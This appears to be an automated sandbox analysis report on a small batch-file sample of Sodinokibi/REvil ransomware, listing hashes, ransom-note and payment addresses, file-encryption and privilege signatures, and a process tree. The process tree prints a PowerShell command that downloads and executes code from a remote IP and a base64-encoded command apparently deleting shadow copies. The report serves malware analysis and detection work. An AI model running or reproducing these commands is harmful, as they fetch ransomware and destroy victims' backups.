Analysis
- max time kernel: 58s
- max time network: 77s
- platform: windows7_x64
- resource: win7
- submitted: 19-08-2020 18:10

Static task: static1

Behavioral task: behavioral1
- Sample: 398e244bda5a94afa8c2c988f37b2cd6.bat
- Resource: win7

Behavioral task: behavioral2
- Sample: 398e244bda5a94afa8c2c988f37b2cd6.bat
- Resource: win10
General
- Target: 398e244bda5a94afa8c2c988f37b2cd6.bat
- Size: 215B
- MD5: 3e3fadb01dd3a604d3d369bc51bb3a6f
- SHA1: 6afb2f7dbd13b3f1aa3b86fda6dd1e44b513f195
- SHA256: dfb5ad14ea6a191cabe5996c4433e3a6b707fb4e5f571a7e6bbc53d6593ee1a7
- SHA512: 100b892215e1896a9b372d21fa4769da6cc7698703cc779f2674dc585d3b03633e7f30aae9fdb4011816db41a775b33fe0853d766c308f3af863c1aa82a1c464
Malware Config

Extracted
- http://185.103.242.78/pastes/398e244bda5a94afa8c2c988f37b2cd6

Extracted
- Path: C:\x04r1y-readme.txt
- Family: sodinokibi
- http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/8519576D4C181A85
- http://decryptor.cc/8519576D4C181A85
Signatures

- Sodin, Sodinokibi, REvil
  Ransomware with advanced anti-analysis and privilege escalation functionality.

- Blacklisted process makes network request (1 IoC)
  Processes (flow | pid | process):
  3 | 296 | powershell.exe

- Modifies extensions of user files (10 IoCs)
  Ransomware generally changes the extension on encrypted files.
  Processes (description | ioc | process):
  File renamed | C:\Users\Admin\Pictures\PushDeny.crw => \??\c:\users\admin\pictures\PushDeny.crw.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\RestartReset.crw => \??\c:\users\admin\pictures\RestartReset.crw.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\AssertDisable.tif => \??\c:\users\admin\pictures\AssertDisable.tif.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\DenyJoin.tif => \??\c:\users\admin\pictures\DenyJoin.tif.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\DisconnectEdit.raw => \??\c:\users\admin\pictures\DisconnectEdit.raw.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\InstallNew.crw => \??\c:\users\admin\pictures\InstallNew.crw.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\InvokeMeasure.tif => \??\c:\users\admin\pictures\InvokeMeasure.tif.x04r1y | powershell.exe
  File opened for modification | \??\c:\users\admin\pictures\DismountEdit.tiff | powershell.exe
  File renamed | C:\Users\Admin\Pictures\DismountEdit.tiff => \??\c:\users\admin\pictures\DismountEdit.tiff.x04r1y | powershell.exe
  File renamed | C:\Users\Admin\Pictures\OutComplete.tif => \??\c:\users\admin\pictures\OutComplete.tif.x04r1y | powershell.exe

- Enumerates connected drives (3 TTPs)

- Modifies service (2 TTPs, 4 IoCs)
  Processes (description | ioc | process):
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe

- Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
  Processes (description | ioc | process):
  Set value (str) | \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2f3rn7jil0t3.bmp" | powershell.exe

- Drops file in Program Files directory (19 IoCs)
  Processes (description | ioc | process):
  File opened for modification | \??\c:\program files\CompleteConvertFrom.xlsx | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\x04r1y-readme.txt | powershell.exe
  File created | \??\c:\program files (x86)\x04r1y-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\LimitMeasure.pcx | powershell.exe
  File opened for modification | \??\c:\program files\RedoConvert.xht | powershell.exe
  File opened for modification | \??\c:\program files\RemoveExpand.gif | powershell.exe
  File opened for modification | \??\c:\program files\ShowInstall.eps | powershell.exe
  File opened for modification | \??\c:\program files\SkipConfirm.mpeg | powershell.exe
  File opened for modification | \??\c:\program files\UpdateSuspend.gif | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\v3.5\x04r1y-readme.txt | powershell.exe
  File created | \??\c:\program files\x04r1y-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\FindSelect.contact | powershell.exe
  File opened for modification | \??\c:\program files\InstallShow.mpp | powershell.exe
  File opened for modification | \??\c:\program files\JoinRegister.vssx | powershell.exe
  File opened for modification | \??\c:\program files\ResizeConnect.TTS | powershell.exe
  File opened for modification | \??\c:\program files\TraceRegister.wmf | powershell.exe
  File opened for modification | \??\c:\program files\ExpandProtect.dib | powershell.exe
  File opened for modification | \??\c:\program files\UndoUpdate.vsdm | powershell.exe
  File created | \??\c:\program files\microsoft sql server compact edition\x04r1y-readme.txt | powershell.exe

- Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
  Processes (pid | process):
  296 | powershell.exe

- Suspicious behavior: EnumeratesProcesses (5 IoCs)
  Processes (pid | process):
  296 | powershell.exe
  296 | powershell.exe
  296 | powershell.exe
  1236 | powershell.exe
  1236 | powershell.exe

- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (description | pid | process):
  Token: SeDebugPrivilege | 296 | powershell.exe
  Token: SeDebugPrivilege | 296 | powershell.exe
  Token: SeDebugPrivilege | 1236 | powershell.exe
  Token: SeBackupPrivilege | 1976 | vssvc.exe
  Token: SeRestorePrivilege | 1976 | vssvc.exe
  Token: SeAuditPrivilege | 1976 | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 296 | powershell.exe

- Suspicious use of WriteProcessMemory (8 IoCs)
  Processes (description | pid | process | target process):
  PID 1456 wrote to memory of 296 | 1456 | cmd.exe | powershell.exe
  PID 1456 wrote to memory of 296 | 1456 | cmd.exe | powershell.exe
  PID 1456 wrote to memory of 296 | 1456 | cmd.exe | powershell.exe
  PID 1456 wrote to memory of 296 | 1456 | cmd.exe | powershell.exe
  PID 296 wrote to memory of 1236 | 296 | powershell.exe | powershell.exe
  PID 296 wrote to memory of 1236 | 296 | powershell.exe | powershell.exe
  PID 296 wrote to memory of 1236 | 296 | powershell.exe | powershell.exe
  PID 296 wrote to memory of 1236 | 296 | powershell.exe | powershell.exe
Processes

- C:\Windows\system32\cmd.exe (depth 1, PID 1456)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\398e244bda5a94afa8c2c988f37b2cd6.bat"
  - Suspicious use of WriteProcessMemory

  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 296)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/398e244bda5a94afa8c2c988f37b2cd6');Invoke-DLBAJCKU;Start-Sleep -s 10000"
    - Blacklisted process makes network request
    - Modifies extensions of user files
    - Sets desktop wallpaper using registry
    - Drops file in Program Files directory
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 3, PID 1236)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken

- C:\Windows\system32\vssvc.exe (depth 1, PID 1976)
  Command line: C:\Windows\system32\vssvc.exe
  - Modifies service
  - Suspicious use of AdjustPrivilegeToken